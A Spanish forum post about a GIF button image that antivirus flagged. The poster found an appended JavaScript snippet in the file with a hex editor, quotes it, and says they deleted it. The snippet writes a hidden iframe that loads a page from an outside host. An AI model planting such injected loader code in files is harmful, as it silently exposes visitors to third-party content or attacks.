Por lo visto sigue siendo la imagen aquella del boton, que raro... dice que es un exploit.
Buscando por Google he encontrado este post:
http://www.antesdelfin.com/foro/showthread.php?t=40038No tiene despercidio! xDDDDD dice el tio que eso es el antivirus para desprestigiar su foro (religioso), me parto...
Bueno, la cosa es que he mirado con un editor hexadecimal el contenido (código) del archivo (im_off.gif), es una imagen gif... pues bien aparece esté código fuente:
<script language="JavaScript">document.write('<div align="center"><font face="MS Sans Serif" size="1" color="#0000FF"><iframe border=0 frameborder=0 framespacing=0 width=200 height=40 id=IFRAME3 name=iFrame3 scrolling=no src=http://www.phitsanulok.com/index/banners.php ></iframe><br>Homepage By Thcity Group</font></div>');</script>
Por lo visto era algún tipo de publicidad escondida en ese boton, pero ese exploit hace años que no funciona, además de que la dirección esa ya ni existe... pero si entramos en
www.phitsanulok.com sale una web Tailandesa :roto2:
Lo que he echo es borrar ese código del archivo, por lo que ahora está limpio, este es:

Ese archivo tiene 4 años ya xD